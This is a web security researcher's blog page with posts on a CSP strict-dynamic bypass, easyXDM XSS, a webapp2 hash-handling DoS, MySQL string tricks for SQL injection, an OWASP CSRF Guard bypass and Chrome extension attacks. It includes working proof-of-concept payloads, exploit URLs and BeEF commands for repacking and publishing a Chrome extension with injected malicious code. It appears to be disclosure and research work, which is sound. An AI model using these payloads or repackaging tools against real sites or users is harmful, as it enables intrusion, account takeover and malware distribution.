Nothing Special   »   [go: up one dir, main page]

Tuesday, June 28, 2016

Reflections on trusting CSP

Tldr; new changes in CSP sweep a huge number of the vulns, yet they enable new bypasses. Internet lives on, ignoring CSP.


Let’s talk about CSP today:
Content Security Policy (CSP) - a tool which developers can use to lock down their applications in various ways, mitigating the risk of content injection vulnerabilities such as cross-site scripting, and reducing the privilege with which their applications execute.

Assume XSS, mkay?

CSP is a defense-in-depth web feature that aims to mitigate XSS (for simplicity, let’s ignore other types of vulnerabilities CSP struggles with). Therefore in the discussion we can safely assume there is an XSS flaw in the first place in an application (otherwise, CSP is a no-op).

With this assumption, effective CSP is one that stops the XSS attacks while allowing execution of legitimate JS code. For any complex website, the legitimate code is either:
  • application-specific code, implementing its business logic, or
  • code of its dependencies (frameworks, libraries, 3rd party widgets)
Let’s see how CSP deals with both of them separately.
Just let me run my code!
When CSP was created, the XSS was mostly caused by reflecting user input in the response (reflected XSS). The first attempt at solving this with CSP was then to move every JS snippet from HTML to a separate resource and disable inline script execution (as those are most likely XSS payloads reflected by the vulnerable application). In addition to providing security benefits, it also encouraged refactoring the applications (e.g. transitioning from spaghetti-code to MVC paradigms or separating the behavior from the view; this was hip at that time).

Of course, this put a burden on application developers, as inline styles and scripts were prevalent back then - in the end almost noone used CSP. And so ‘unsafe-inline’ source expression was created. With it, it allowed the developers to use CSP without the security it provides (as now the attacker could again inject code through reflected XSS).

Introducing insecurity into a security feature to ease adoption is an interesting approach, but at least it’s documented:
In either case, developers SHOULD NOT include either 'unsafe-inline', or data: as valid sources in their policies. Both enable XSS attacks by allowing code to be included directly in the document itself; they are best avoided completely.
That’s why this new expression used the unsafe- prefix. If you’re opting out of security benefits, at least you’re aware of it. Later on this was made secure again when nonces were introduced. From then on, script-src 'unsafe-inline' 'nonce-12345' would only allow inline scripts if the nonce attribute had a given value.

Unless the attacker knew the nonce (or the reflection was in the body of a nonced script), their XSS payload would be stopped. Developers then had a way to use inline scripts in a safe fashion. 
But what about my dependencies?
Most of the application dependencies were hosted on CDNs, and had to continue working after CSP was enabled in the application. CSP allowed developers to specify allowed URLs / paths and origins, from which the scripts could be loaded. Anything not on the whitelist would be stopped.

By using the whitelist in CSP you effectively declared that you trusted whatever scripts were there on it. You might not have the control over it (e.g. it’s not sourced from your servers), but you trust it - and it had to be listed explicitly.

Obviously, there were a bunch of bypasses (remember, we assume the XSS flaw is present!) - for one, a lot of CDNs are hosting libraries that execute JS from the page markup, rendering CSP useless as long as certain CDNs are whitelisted. There were also different bypasses related to path & redirections (CSP Oddities presentation summarizes those bypasses in a great way).

In short, it was a mess - also for maintenance. For example, this is a script-src from Gmail:
script-src https://clients4.google.com/insights/consumersurveys/ 'self' 'unsafe-inline' 'unsafe-eval' https://mail.google.com/_/scs/mail-static/ https://hangouts.google.com/ https://talkgadget.google.com/ https://*.talkgadget.google.com/ https://www.googleapis.com/appsmarket/v2/installedApps/ https://www-gm-opensocial.googleusercontent.com/gadgets/js/ https://docs.google.com/static/doclist/client/js/ https://www.google.com/tools/feedback/ https://s.ytimg.com/yts/jsbin/ https://www.youtube.com/iframe_api https://ssl.google-analytics.com/ https://apis.google.com/_/scs/abc-static/ https://apis.google.com/js/ https://clients1.google.com/complete/ https://apis.google.com/_/scs/apps-static/_/js/ https://ssl.gstatic.com/inputtools/js/ https://ssl.gstatic.com/cloudsearch/static/o/js/ https://www.gstatic.com/feedback/js/ https://www.gstatic.com/common_sharing/static/client/js/ https://www.gstatic.com/og/_/js/

Why so many sources? Well, if a certain script from, say https://talkgadget.google.com/ loads a new script, it needs to be whitelisted too.

There are various quirks and bypasses with this type of CSP, but at least it’s explicit. If a feature is unsafe, it’s marked as so, together with the trust I put into all other origins - and that trust is not transitive. Obviously, at the same time it’s very hard to adopt and maintain such a CSP for a given application, especially if your dependencies change their code.

The solution for that problem was recently proposed in the form of strict-dynamic source expression. 
Let's be strict! What’s strict-dynamic? Let’s look at the CSP spec itself:
The "'strict-dynamic'" source expression aims to make Content Security Policy simpler to deploy for existing applications who have a high degree of confidence in the scripts they load directly, but low confidence in their ability to provide a reasonably secure whitelist. 
If present in a script-src or default-src directive, it has two main effects: 
1. host-source and scheme-source expressions, as well as the "'unsafe-inline'" and "'self' keyword-sources will be ignored when loading script.
2. hash-source and nonce-source expressions will be honored. Script requests which are triggered by non-parser-inserted script elements are allowed.

The first change allows you to deploy "'strict-dynamic' in a backwards compatible way, without requiring user-agent sniffing: the policy 'unsafe-inline' https: 'nonce-abcdefg' 'strict-dynamic' will act like 'unsafe-inline' https: in browsers that support CSP1, https: 'nonce-abcdefg' in browsers that support CSP2, and 'nonce-abcdefg' 'strict-dynamic' in browsers that support CSP3. 
The second allows scripts which are given access to the page via nonces or hashes to bring in their dependencies without adding them explicitly to the page’s policy.
While it might not be obvious from the first read, it introduces a transitive trust concept into the CSP. Strict-dynamic (in supporting browsers) turns off the whitelists completely. Now whenever an already allowed (e.g. because it carried a nonce) code creates a new script element and injects it into the DOM - its execution would not be stopped, regardless of its properties (e.g. the src attribute value or a lack of a nonce). Additionally, it could in turn create additional scripts. It’s like a tooth fairy handed off nonces to every new script element.


As a consequence, now you’re not only trusting your direct dependencies, but also implicitly assume anything they would load at runtime is fair game for your application too. By using it you’re effectively trading control for ease of maintenance.
POC||GTFO Usefulness of CSP can be determined by its ability to stop the attack assuming there is an XSS flaw in the application. By dropping the whitelists it obviously increases the attack surface, even more so by introducing the transitive trust.

On the other hand, it facilitates adopting a CSP policy that uses nonces. Enabling that, it mitigates a large chunk of reflected XSS flaws, as the injection point would have to be present inside a script element to execute (which is, I think, a rare occurrence). Unfortunately, DOM XSS flaws are much more common nowadays.

For DOM XSS flaws, strict-dynamic CSP would be worse than “legacy” CSP any time a code could be tricked into creating an attacker-controlled script (as old CSP would block it, but the new one would not). Unfortunately, such a flaw is likely present in a large number of applications. For example, here’s an exemplary exploit for applications using JQuery <3.0.0 using this vuln.
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="Content-Security-Policy" content="script-src 'unsafe-inline' 
      'nonce-booboo' 'strict-dynamic'"> 
  <script nonce='booboo' src="https://code.jquery.com/jquery-2.2.4.js" ></script>
</head> 
<body>
<script nonce=booboo> 
// Patched in jQuery 3.0.0
// See https://github.com/jquery/jquery/issues/2432
// https://www.w3.org/TR/CSP3/#strict-dynamic-usage 
$(function() { 
   // URL control in $.get / $.post is a CSP bypass 
   // for CSP policies using strict-dynamic. 
   $.get('data:text/javascript,"use strict"%0d%0aalert(document.domain)');
});
</script>
</body>
</html>

Try it out (requires Chrome 52): https://plnkr.co/edit/x9d0ClcWOrl3tUd33oZR?p=preview

JQuery has a market share of over 96%, so it’s not hard to imagine a large number of applications using $.get / $.post with controlled URLs. For those, strict-dynamic policies are trivially bypassable.
Summary It was already demonstrated we can’t effectively understand and control what’s available in the CDNs we trust in our CSPs (so we can’t even maintain the whitelists we trust). How come losing control and making the trust transitive is a solution here?

At the very least, these tradeoffs should be expressed by using an unsafe- prefix. In fact, it used to be called unsafe-dynamic, but that was dropped recently. So now we have a strict-* expression that likely enabled bypasses that were not present with oldschool CSP. All that to ease adoption of a security mitigation. Sigh :/

Thursday, July 31, 2014

JS crypto goto fail?

tldr; A long, passionate discussion about JS crypto. Use slides for an overview.

Javascript cryptography is on the rise. What used to be a rich source of vulnerabilities and regarded as "not a serious research area", suddenly becomes used by many. Over the last few years, there was a serious effort to develop libraries implementing cryptographic primitives and protocols in JS. So now we have at least:
On top of that, there's a lot of fresh, new user-facing applications (Whiteout.IOKeybase.io, miniLock to name just the fancy ones on .io domains).  JS crypto is used in websites, browser extensions, and server side-applications - whether we like it or not. It is time to look again at the challenges and limits of crunching secret numbers in Javascript.

Saturday, March 22, 2014

When you don't have 0days. Client-side exploitation for the masses

Yesterday me and @antisnatchor gave a talk at Insomni'hack entitled "When you don't have 0days. Client-side exploitation for the masses". We described different tricks that one can use during a pentesting assignment to achieve goals without burning any of those precious 0days.

The tricks included the new Chrome extension exploitation tools ported recently to BeEF (by yours truly and @antisnatchor), HTA (HTML applications), Office macros, abusing UI expectations in IE, and some tricks with Java applets running on older Java. Mosquito was also demonstrated. Without further ado, here are the slides:


When you don't have 0days: client-side exploitation for the masses from Michele Orru

All the video links for the demos are on the slides, the code is public and landed in BeEF in tools/ subdirectory. The gist of the Chrome extensions part: you can now clone an arbitrary Chrome extension, add any code to it, and publish it back as your extension by doing:

$ cd beef/tools/chrome_extension_exploitation/
$ injector/repacker-webstore.sh <original-ext-id> zip 
repacked.zip evil.js “evil-permissions”
$ ruby webstore_uploader/webstore_upload.rb repacked.zip publish

Enjoy!

Monday, January 13, 2014

XSSing with Shakespeare: Name-calling easyXDM

tl;dr: window.name, DOM XSS & abusing Objects used as containers

What's in a name?

"What's in a name? That which we call a rose
By any other name would smell as sweet"
(Romeo & Juliet, Act II, Scene 2)

While Juliet probably was a pretty smart girl, this time she got it wrong. There is something special in a name. At least in window.name. For example, it can ignore Same Origin Policy restrictions. Documents from https://example.com and https://foo.bar are isolated from each other, but they can "speak" through window.name.

Since name is special for Same Origin Policy, it must have some evil usage, right? Right - the cutest one is that eval(name)is the shortest XSS payload loader so far:
  • create a window/frame
  • put the payload in it's name
  • just load http://vuln/?xss="><script>eval(name)</script>.
But that's old news (I think it was Gareth's trick, correct me if I'm wrong). This time I'll focus on exploiting software that uses window.name for legitimate purposes. A fun practical challenge (found by accident, srsly)!

Friday, December 27, 2013

Rapportive XSSes Gmail or have yourself a merry little botnet...

tldr: Learn how to code audit Handlebars applications. Xss in extension = fun times. Mosquito gets new features.

It's that magical time of the year, when wonders happen... Everyone's getting big presents. I was apparently naughty, cause I only got one XSS. What can one do? If life gives you lemons...


you make a lemonade. And I don't mean Google juice - it does not qualify.

But XSS on Gmail?!

You see, the code executing on mail.google.com domain is not always the one belonging to Google, subject to their bug bounty. Unfortunately, there's much, much code coming from all other domains too, that does not come close to Google quality. I'm of course talking about browser extensions. I've been researching this subject for two years now, with quite a few results, and if I had to sum it all up in one sentence it would be:

Browser extensions are badly coded, can affect your website with their vulnerabilities and there's nothing you can do about it.

And this is exactly the case here: We have a top-notch Gmail application and a very popular extension that reduces Gmail to a lousy PHPBB-like forum full of XSSes. But this time, I decided to push the matter forward and demonstrate what's possible when one can execute JS in Gmail origin. But first, let me introduce you to our today's hero, Rapportive.

Monday, December 16, 2013

Breaking Google AppEngine webapp2 applications with a single hash

What's this, you think?

07667c4d55d8d81a0f0ac47b2edba75cb948d3a2$sha1$1FsWaTxdaa5i

It's easy to tell that this is a salted password hash, using sha1 as the hashing algorithm. What do you do with it? You crack it, obviously!

No wonder that when talking about password hashes security, we usually only consider salt length, using salt & pepper or speed of the algorithm. We speculate their resistance to offline bruteforcing. In other words, we're trying to answer the question "how f^*$d are we when the attacker gets to read our hashes". Granted, these issues are extremely important, but there are others.

A weird assumption

Today, we'll speculate what can be done when the attacker gets to supply you with a password hash like above.

Who would ever allow the user to submit a password hash, you ask? Well, for example Wordpress did and had a DoS because of that. It's just bound to happen from time to time (and it's not the point of this blog post anyway), Let's just assume this is the case - for example, someone wrote a malicious hash in your DB.

Introducing the culprit

We need to have some code to work on. Let's jump on the cloud bandwagon and take a look at Google AppEngine. For Python applications, Google suggests webapp2. Fine with me, let's do it!

When authenticating users in webapp2, you can just make them use Google Accounts and rely on OAuth, but you can also manage your users accounts & passwords on your own. Of course, passwords are then salted and hashed - you can see the example hash at the beginning of this post. For hashing, webapp2 security module uses a standard Python module, hashlib.

Authenticating in webapp2

When does webapp2 application process a hash? Usually, when authenticating. For example, if user ba_baracus submits a password ipitythefool, application:
  1. Finds the record for user ba_baracus
  2. Extracts his password hash: 07667c4d55d8d81a0f0ac47b2edba75cb948d3a2$sha1$1FsWaTxdaa5i
  3. Parses it, extracting the random salt (1FsWaTxdaa5i) and algorithm (sha1)
  4. Calculates sha1 hash of ipitythefool, combined with the salt (e.g. uses hmac with salt as a key)
  5. Compares the result with 07667c4d55d8d81a0f0ac47b2edba75cb948d3a2. Sorry, Mr T, password incorrect this time!

1 and 2 happen in User.get_by_auth_password() 3 to 5 in in webapp2_extras.security.check_password_hash():
def check_password_hash(password, pwhash, pepper=None):
    """Checks a password against a given salted and hashed password value.

    In order to support unsalted legacy passwords this method supports
    plain text passwords, md5 and sha1 hashes (both salted and unsalted).

    :param password:
        The plaintext password to compare against the hash.
    :param pwhash:
        A hashed string like returned by :func:`generate_password_hash`.
    :param pepper:
        A secret constant stored in the application code.
    :returns:
        `True` if the password matched, `False` otherwise.

    This function was ported and adapted from `Werkzeug`_.
    """
    if pwhash.count('$') < 2:
        return False

    hashval, method, salt = pwhash.split('$', 2)
    return hash_password(password, method, salt, pepper) == hashval


def hash_password(password, method, salt=None, pepper=None):
    """Hashes a password.

    Supports plaintext without salt, unsalted and salted passwords. In case
    salted passwords are used hmac is used.

    :param password:
        The password to be hashed.
    :param method:
        A method from ``hashlib``, e.g., `sha1` or `md5`, or `plain`.
    :param salt:
        A random salt string.
    :param pepper:
        A secret constant stored in the application code.
    :returns:
        A hashed password.

    This function was ported and adapted from `Werkzeug`_.
    """
    password = webapp2._to_utf8(password)
    if method == 'plain':
        return password

    method = getattr(hashlib, method, None)
    if not method:
        return None

    if salt:
        h = hmac.new(webapp2._to_utf8(salt), password, method)
    else:
        h = method(password)

    if pepper:
        h = hmac.new(webapp2._to_utf8(pepper), h.hexdigest(), method)

    return h.hexdigest()
So, during authentication, we control pwhash (it's our planted hash), and password. What harm can we do? First, a little hashlib 101:

Back to school

How does one use hashlib? First, you create an object with a specified algorithm:
new(name, string='') - returns a new hash object implementing the
                       given hash function; initializing the hash
                       using the given string data.

Named constructor functions are also available, these are much faster
than using new():

md5(), sha1(), sha224(), sha256(), sha384(), and sha512()
Then you just fill it with string to hash, using update() method (you can also pass the string directly to the constructor), and later on use e.g. hexdigest() to extract the hash. Very simple:
>>> import hashlib
>>> hashlib.md5('a string').hexdigest()
'3a315533c0f34762e0c45e3d4e9d525c'
>>> hashlib.new('md5','a string').hexdigest()
'3a315533c0f34762e0c45e3d4e9d525c'

Webapp2 uses getattr(hashlib, method)(password).hexdigest(), and we control both method and password.

Granted, the construct does its job. Installed algorithms work, NoneType error is thrown for non supported algorithms, and the hash is correct:
>>> getattr(hashlib, 'md5', None)('hash_me').hexdigest()
'77963b7a931377ad4ab5ad6a9cd718aa'
>>> getattr(hashlib, 'sha1', None)('hash_me').hexdigest()
'9c969ddf454079e3d439973bbab63ea6233e4087'
>>> getattr(hashlib, 'nonexisting', None)('hash_me').hexdigest()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: 'NoneType' object is not callable

It's a kind of magic!

There is a slight problem with this approach though - magic methods. Even a simple __dir__ gives us a hint that there's quite a few additional, magic methods:
>>> dir(hashlib)
['__all__', '__builtins__', '__doc__', '__file__', '__get_builtin_constructor', '__name__', '__package__', '_hashlib', 'algorithms', 'md5', 'new', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512']
which means, for example, that if arbitrary strings can be passed as 2nd attribute to getattr(), there's much more than NoneType error that can happen:
>>> getattr(hashlib, '__name__')()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: 'str' object is not callable
>>> getattr(hashlib, '__class__')
<type 'module'>
>>> getattr(hashlib, '__class__')('hash_me')
<module 'hash_me' (built-in)>
>>> getattr(hashlib, 'new')('md5').hexdigest()
'd41d8cd98f00b204e9800998ecf8427e' # this is actually md5 of ''
That last bit is kewl - you can plant a hash format: md5_of_empty_string$new$ and the correct password is... md5!

Final act

__class__ may have a class, but __delattr__ is the real gangster!
>>> import hashlib
>>> hashlib.sha1
<built-in function="" openssl_sha1="">
>>> getattr(hashlib, '__delattr__')('sha1').hexdigest()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'NoneType' object has no attribute 'hexdigest'
>>> hashlib.sha1
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'module' object has no attribute 'sha1'

Ladies and gentlemen, we just broke a Google AppEngine webapp2 application with a single hash! We just deleted the whole hashlib.sha1 function, and all subsequent hash comparison will be invalid! In other words, no user in this application instance with sha1 hash will be able to authenticate. Plus, we broke session cookies as well, as session cookies use hashlib.sha1 for signature (but that's another story). As this is not a PHP serve-one-request-and-die model, but a full-blown web application, this corrupted hashlib will live until application has shut down and gets restarted (methinks, at least that's the behavior I observed). After that, you can still retrigger that vuln by authenticating again!

Demo

Disclaimer: This is tracked with issue #87Only applications that allow the user to write a hash somehow are vulnerable (and this setup is probably exotic). But getattr(hashlib, something-from-user) construct is very popular, so feel free to find a similar vulnerability elsewhere:


Tuesday, October 15, 2013

Exploiting EasyXDM part 2: & considered harmful


tldr: URL parsing is hard, always encode stuff and Safari has some interesting properties...

This is a second post describing easyXDM vulnerabilities. Reading the first part might come in handy:

Intro

"EasyXDM is a Javascript library that enables you as a developer to easily work around the limitation set in place by the Same Origin Policy, in turn making it easy to communicate and expose javascript API’s across domain boundaries". Vulnerabilities were found in 2.4.16 version, and are patched in 2.4.18. They are tracked with a single CVE-2013-5212.

In first post I've described XSS vulnerability in Flash transport used by that library, however the exploit conditions were very limiting. On websites using easyXDM the following code (used e.g. to set up RPC endpoints):
<script type="text/javascript" src="easyXDM.debug.js">
</script>
<script type="text/javascript">
    var transport = new easyXDM.Socket({
        local: ".",
        swf: "easyxdm.swf",
    });
</script>
can cause XSS when it's loaded by URL like: http://example.com?#xdm_e=https%3A%2F%2Flossssscalhost&xdm_c=default7059&xdm_p=6&xdm_s=j%5C%22-alerssst(2)))%7Dcatch(e)%7Balert(document.domain)%7D%2F%2Feheheh. That will force easyXDM to use vulnerable Flash transport and pass the injected XSS payload. However, the payload will only be used unless Flash file is set up with FlashVars parameter log=true.

Mom, where do flashvars come from?

Let's dig deeper. How is the HTML for the SWF inclusion constructed? Looking at the source code at GitHub (FlashTransport.js):
function addSwf(domain){
...
  // create the object/embed
  var flashVars = "callback=flash_loaded" + domain.replace(/[\-.]/g, "_") + "&proto=" + 
      global.location.protocol + "&domain=" + getDomainName(global.location.href) + "&port=" +   
      getPort(global.location.href) + "&ns=" + namespace;
  // #ifdef debug
  flashVars += "&log=true";
  // #endif
  ..
  swfContainer.innerHTML = ... + "<param name='flashvars' value='" +
  flashVars +
  "'></param>" ....
This 'debug' flag is a preprocessor instruction. The #ifdef / #endif block of code will only be included in easyXDM.debug.js file:
<!-- Process pre proccesing instructions like #if/#endif etc -->
<preprocess infile="work/easyXDM.combined.js" outfile="work/easyXDM.js"/>
<preprocess infile="work/easyXDM.combined.js" outfile="work/easyXDM.debug.js" defines="debug"/>
Exploiting easyXDM.debug.js file described in the first post was straightforward. But if production version of easyXDM library is used instead, there is no log parameter and XSS won't work. What can we do? Like always - look at the code, because code=vulns.

Thou shalt not parse URLs thyself!

In FlashVars construction code getPort and getDomainName functions are used to extract domain and port parameters from current window location (global.location). Let's see what happens with domain name (Core.js):
function getDomainName(url){
    // #ifdef debug
    if (!url) {
        throw new Error("url is undefined or empty");
    }
    // #endif
    return url.match(reURI)[3];
}
It is being matched against the following regular expression:
var reURI = /^((http.?:)\/\/([^:\/\s]+)(:\d+)*)/; // returns groups for protocol (2), domain (3) and port (4)
In simpler terms - everything after httpX:// and before :digits or a / becomes a domain name. Seems solid, right? WRONG.
Among many tricks bypassing URL parsers (see e.g. kotowicz.net/absolute), HTTP authentication parameters are rarely used. But this time they fit perfectly. You see, hostname (domain name) is not the only thing that comes right after protocol. Not to bore you with RFCs, this is also a valid URL:

http://user:password@host/

If our document was loaded from URL containing user credentials, getDomainName() would return user:password@host (sometimes, there are browser differences here). FlashVars, in that case, would be: 
callback=flash_loaded_something&proto=http:&domain=user:password@host&port=&ns=something
Still, nothing interesting, but...

Honor thy Encoding and thy Context

(c) Wumo - http://kindofnormal.com/wumo/2013/10/12
In previous example we injected some characters into FlashVars string, but none of them were dangerous in that context. But as you can see:
  var flashVars = "callback=flash_loaded" + domain.replace(/[\-.]/g, "_") + "&proto=" + global.location.protocol + "&domain=" + getDomainName(global.location.href) + "&port=" + getPort(global.location.href) + "&ns=" + namespace;
Values of various parameters are not percent encoded (i.e. encodeURIComponent is not used) If we could only use & and = characters in username part, we could inject additional Flashvars. For example, loading this URL:

http://example.com&log=true&a=@example.com?#xdm_e=https%3A%2F%2Flossssscalhost&xdm_c=default7059&xdm_p=6&xdm_s=j%5C%22-alerssst(2)))%7Dcatch(e)%7Balert(document.domain)%7D%2F%2Feheheh

(the bold part is actually the username, not a domain name) would cause:
...proto=http:&domain=example.com&log=true&a=@example.com&port=...
injecting our log=true parameter and triggering the exploit. But can we?

Effin phishers!

Kinda. Credentials in URL were used extensively in phishing attacks, so most current browsers don't really like them. While usually you can use = and & characters in credentials, there are serious obstacles, f.e:
  • Firefox won't return credentials at all in location.href
  • Chrome will percent encode crucial characters, including = and &
However, Safari 6 does not see a problem with loading URL like this: http://h=&ello@localhost/ and returning the same thing in location.href. So - easyXDM 2.4.16 is XSS exploitable in Safari 6 and possibly in some other obscure or ancient browsers. In Safari due to effing phishers using credentials in URL will trigger a phishing warning, so the user must confirm the navigation. Well, Sad Panda^2. But still - it's an easyXDM universal XSS on a popular browser with limited user interaction.

Developers

  • Always use context aware encoding!
  • Don't parse URLs manually!

Monday, September 23, 2013

Exploiting EasyXDM part 1: Not the usual Flash XSS

tldr: You're using easyXDM? Upgrade NOW. Otherwise - read up on exploiting difficult Flash vulnerabilities in practice.

Secure cross-domain communication is hard enough, but it's a piece of cake compared to making it work in legacy browsers. One popular library that tries to handle all the quirks and even builds an RPC framework is easyXDM.

But this is not an advertisement. As usual, you only get to hear about easyXDM here, because I found some interesting vulnerabilities. Combined, those allow me to XSS websites using that library. Certain conditions apply. As exploiting the subject matter is quite complex, I decided to split the post into two parts, this being the first one.

Thursday, July 11, 2013

Jealous of PRISM? Use "Amazon 1 Button" Chrome extension to sniff all HTTPS websites!

tldr: Insecure browser addons may leak all your encrypted SSL traffic, exploits included

So, Snowden let the cat out of the bag. They're listening - the news are so big, that feds are no longer welcome at DEFCON. But let's all be honest - who doesn't like to snoop into other person's secrets? We all know how to set up rogue AP and use ettercap. Setting up your own wall of sheep is trivial. I think we can safely assume - plaintext traffic is dead easy to sniff and modify.

The real deal though is in the encrypted traffic. In browser's world that means all the juicy stuff is sent over HTTPS. Though intercepting HTTPS connections is possible, we can only do it via:
  • hacking the CA
  • social engineering (install the certificate) 
  • relying on click-through syndrome for SSL warnings
Too hard. Let's try some side channels. Let me show you how you can view all SSL encrypted data, via exploiting Amazon 1Button App installed on your victims' browsers.  

Friday, January 11, 2013

Abusing MySQL string arithmetic for tiny SQL injections

Today I've found a small nifty trick that may become helpful when exploiting SQL injection vulnerabilities for MySQL. Namely, you can abuse MySQL string typecasting.

But first, let's look at this:

MySQL, what are you doing?

mysql> desc t;
+-------+-------------+------+-----+---------+-------+
| Field | Type        | Null | Key | Default | Extra |
+-------+-------------+------+-----+---------+-------+
| name  | varchar(20) | YES  |     | NULL    |       |
| num   | int(11)     | YES  |     | NULL    |       |
+-------+-------------+------+-----+---------+-------+
2 rows in set (0.11 sec)
mysql> select * from t;
+--------+------+
| name   | num  |
+--------+------+
| nazwa  |    3 |
| second |    4 |
+--------+------+
2 rows in set (0.00 sec)
mysql> select * from t where name='';
Empty set (0.00 sec)
mysql> select * from t where name=''-'';
+--------+------+
| name   | num  |
+--------+------+
| nazwa  |    3 |
| second |    4 |
+--------+------+
2 rows in set, 2 warnings (0.00 sec)
WTF just happened? Warnings clear up the situation a little bit:
mysql> show warnings;
+---------+------+--------------------------------------------+
| Level   | Code | Message                                    |
+---------+------+--------------------------------------------+
| Warning | 1292 | Truncated incorrect DOUBLE value: 'nazwa'  |
| Warning | 1292 | Truncated incorrect DOUBLE value: 'second' |
+---------+------+--------------------------------------------+
2 rows in set (0.00 sec)
Minus operator used on strings converted them to DOUBLE, a numeric value. What's the result of this statement?
mysql> select ''-'';
+-------+
| ''-'' |
+-------+
|     0 |
+-------+
So for each row the 'name' column was compared to 0. That triggerred another type conversion and, with a warning, for each row the effective value was 0, which satisfied the WHERE condition (0 = ''-'').

The SQL injection part

How can the attacker abuse this quirk? Imagine that you:
  • have a limited character set (e.g. no whitespace, no equals sign, no parenthesis, no letters) or small length available,
  • vulnerable query SELECT secret FROM table WHERE secret='$injection' AND another>5 AND ... .that needs to return at least one row,
  • and you don't know the values for the secret column (they're not easily enumerable),
Simple payload: '-''# will turn that query into:
SELECT secret FROM table WHERE fld=''-''# AND .....
and will return all rows (apart from those that match /^-?[0-9]/)

You can use the same trick with ''+'', ''&'',''^'' and ''*''. Beware though:
mysql> select 1 from dual where 'something' = ''/'';
Empty set, 1 warning (0.00 sec)

mysql> select 1 from dual where 'something' = ''/1;
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set, 1 warning (0.00 sec)
Another trick would be to simply compare a string column to ''-0:
mysql> select * from t where name=''-0;
+--------+------+
| name   | num  |
+--------+------+
| nazwa  |    3 |
| second |    4 |
+--------+------+
2 rows in set, 2 warnings (0.00 sec)

The tricks mentioned here were tested on MySQL 5.5 and 5.1, but should work in older versions too.

And that's all folks. For all your SQL injection techniques, I highly recommend The SQL injection reference by Roberto Salgado. It helped me numerous times and is in my opinion the best reference on SQLi ever made.

Friday, December 7, 2012

On handling your pets and a CSRF protection that wasn't

Security is hard. While security-related issues are fun and challenging subject for many - fun enough for them to take part in various CTFs, crackmes etc, it's usually not the first thing a developer cares for. Yes, they do have other priorities. That's why usually leaving a developer with a task of writing security-related code results in either:

Look what I found, ma!

Using libraries though is like bringing a pet home. Sure, it's cute and all, but you should be responsible for it from now on. That means you should:
  1. Care for it day after day (= keep libraries up to date).
  2. Observe it. If it's sick, go to a vet (= monitor for security vulnerabilities discovered).
  3. Accept that it's a part of the family now (= treat it with as much scrutiny as your own code).
Whatever you're bringing into your codebase, wherever it came from - it's your responsibility now. No matter if it's a snippet found in a forum, a github.com hosted library used by a few dozen people or a project used for many years and extensively tested. It may have a security vulnerability, it may be used insecurely, it may not be a right tool for a task. Be skeptical.

The code allmighty

There are no sacred cows. Any code is just that - a piece of instructions made by humans, with a certain possibility of having errors, some of that security related. And every human makes mistakes, some of them catastrophic.

Let me give you an example - OWASP PHP CSRF Guard - a small library for enriching your PHP application with CSRF protection. Similar to what OWASP CSRFGuard does for Java applications. This small library is presented in Open Web Application Security Project wiki, so it must be secure.....Right?

No. No sacred cows, remember? Take a look:
if (!isset($_POST['CSRFName']))
{
 trigger_error("No CSRFName found, probable invalid request.",E_USER_ERROR);  
} 
$name =$_POST['CSRFName'];
$token=$_POST['CSRFToken'];
if (!csrfguard_validate_token($name, $token))
{ 
 trigger_error("Invalid CSRF token.",E_USER_ERROR);
}
Application uses separate tokens for every form. Upon form submission, it gets form id (CSRFName) and appropriate token (CSRFToken) from POST request and calls csrf_validate_token(). So far so good. Let's dig deeper though.
function csrfguard_validate_token($unique_form_name,$token_value)
{
 $token=get_from_session($unique_form_name);
 if ($token===false)
 {
  return true;
 }
 elseif ($token==$token_value)
 {
  $result=true;
 }
 else
 { 
  $result=false;
 } 
 unset_session($unique_form_name);
 return $result;
}
Function retrieves the token for a form id from session (get_from_session). Function returning false is some exception, let's skip that. Then token value from POST is compared to its session equivalent. Looks ok. But..
function get_from_session($key)
{
 if (isset($_SESSION))
 {
  return $_SESSION[$key];
 }
 else {  return false; } //no session data, no CSRF risk
}
What happens if there is no such $key in $_SESSION? null will be returned. So, retrieving a token for non-existent form id will return null.

Guess what? In PHPnull == "". So, submitting this:
CSRFName=CSRFGuard_idontexist&CSRFToken=&input1=value1&input2=value2....
in your POST request will call:
csrfguard_validate_token('CSRFGuard_idontexist', '') // and then
$token = get_from_session('CSRFGuard_idontexist') = null; // => 
$token_value = ''; // => 
$token_value == $token; // =>
return true;
Total CSRF protection bypass. No sacred cows. Of course, the code in OWASP wiki has been fixed now.

Developers, remember: Do not blindly include libraries, even OWASP ones, without testing them, especially for security errors. If you can't do it - there are other people who can ( ^-^ ). After all, even if it's adopted, it's part of the family now.

Friday, November 9, 2012

Keys to a kingdom - can you crack a JS crypto?

I've posted a small, quick challenge for all of you to try. It's got it all - HTML5, crypto, client-side Javascript, fast action, neat dialogues and a beautiful princess.

It can be solved in multiple ways. Even if you've already beaten it - try doing it another way. I can promise that you'll learn something new along the way.

So, without further ado, I present to you:


Good luck!

Friday, September 28, 2012

Owning a system through a Chrome extension - cr-gpg 0.7.4 vulns

tldr; read all. fun stuff.

I've recently shown a few ways one can abuse certain Chrome extensions. For example it is possible to fingerprint all the extensions current user has installed. Also, they suffer from standard web vulnerabilities. XSS is so common that I've built XSS Chef to assist the exploitation. Together with @theKos we ran workshops on exploiting Chrome extensions.

But the most interesting vulnerabilities may be hidden in the code of plugins (NPAPI .dll, .so files) that are sometimes bundled with extensions. These are binary files that run outside of Google Chrome sandboxes. Plugin functions are of course being called from extensions Javascript code. So, through XSS one could exploit e.g. a buffer overflow, use-after-free and, theoretically, hijack OS user account.

The threat isn't theoretical though. I was able to find a chain of vulnerabilities in cr-gpg extension which handles PGP encryption/decryption from within Gmail interface. Funny thing - the exact same vulnerabilities were reported independently by Gynvael Coldwind - great finds, Gynvael! All reported issues below were present in 0.7.4 version and are fixed in >=0.8.2.

Tuesday, September 11, 2012

If it's a CRIME, then I'm guilty

tldr: see bottom for the script that demonstrates what CRIME might do.
A secret crime  Juliano Rizzo and Thai Duong did it again. Their new attack on SSL called CRIME, just like their previous one, BEAST is able to extract cookie values (to perform a session hijack) from SSL/TLS encrypted sessions. BEAST was a chosen plaintext attack and generally required:
  • Man-in-the-middle (attacker monitors all encrypted traffic)
